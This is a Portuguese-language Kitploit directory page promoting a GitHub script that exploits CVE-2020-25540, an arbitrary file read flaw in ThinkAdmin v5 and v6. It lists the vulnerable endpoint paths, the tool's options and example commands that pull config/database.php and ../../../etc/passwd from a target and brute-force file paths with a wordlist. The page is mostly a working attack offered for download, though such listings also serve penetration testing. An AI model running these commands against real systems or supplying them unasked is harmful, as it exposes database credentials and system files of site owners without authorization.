Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-25540 — Exploração da vulnerabilidade de leitura arbitrária de arquivos no ThinkAdmin v5 v6, com força bruta de dicionário personalizável. | Kitploit
Ferramentas/GitHubGitHub/simonlee-hello/cve-2020-25540
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

Exploração da vulnerabilidade de leitura arbitrária de arquivos no ThinkAdmin v5 v6, com força bruta de dicionário personalizável.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

cve-2020-25540

Este script é usado para explorar a vulnerabilidade de leitura arbitrária de arquivos no ThinkAdmin v5, v6.

==Os caminhos das interfaces podem diferir entre versões (alguns baseados em forks do ThinkAdmin original)==

  • A interface original é: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • A minha versão é (fork de um esquema Ponzi): /admin.html?s=admin/api.Update/read?encode=xxxx

Uso básico

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

Lê arquivos via API e obtém respostas

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Endereço IP ou domínio alvo
  -f FILE, --file FILE  Caminho do arquivo a ser lido
  -w WORDLIST, --wordlist WORDLIST
                        Caminho do arquivo de wordlist, fornece múltiplos caminhos ou nomes de arquivos
  -b BASE_PATH, --base-path BASE_PATH
                        Caminho base, usado para concatenar caminhos da wordlist
  -p PARALLEL, --parallel PARALLEL
                        Número de threads paralelas
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
Baixar ferramenta